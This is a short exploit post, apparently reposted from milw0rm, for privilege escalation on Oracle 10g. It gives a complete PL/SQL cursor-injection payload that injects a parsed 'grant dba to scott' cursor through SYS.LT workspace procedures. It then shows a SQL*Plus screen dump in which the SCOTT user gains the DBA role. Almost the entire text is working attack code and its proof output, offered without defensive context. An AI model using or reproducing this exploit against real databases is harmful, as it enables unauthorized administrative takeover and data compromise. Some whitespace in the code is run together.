[exploit] Oracle 10G 提權

This is slightly modified version of: http://milw0rm.com/exploits/7677This is based on cursor injection and does not need create function privileges:DECLARED NUMBER;BEGIND := DBMS_SQL.OPEN_CURSOR;DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');end;#-----------screen dump---------------------------------------------------#SQL> select * from user_role_privs;USERNAME                       GRANTED_ROLE                   ADM DEF OS_------------------------------ ------------------------------ --- --- ---SCOTT                          CONNECT                        NO  YES NOSCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NOSCOTT                          RESOURCE                       NO  YES NOSQL> DECLARE  2  D NUMBER;  3  BEGIN  4  D := DBMS_SQL.OPEN_CURSOR;  5  DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);  6  SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');  7  SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');  8  end;  9 10 11  /DECLARE*ERROR at line 1:ORA-01403: no data foundORA-06512: at "SYS.LT", line 6118ORA-06512: at "SYS.LT", line 6087ORA-06512: at line 7SQL> select * from user_role_privs;USERNAME                       GRANTED_ROLE                   ADM DEF OS_------------------------------ ------------------------------ --- --- ---SCOTT                          CONNECT                        NO  YES NOSCOTT                          DBA                            NO  YES NOSCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NOSCOTT                          RESOURCE                       NO  YES NOSidwww.notsosecure.com#From：milw0rm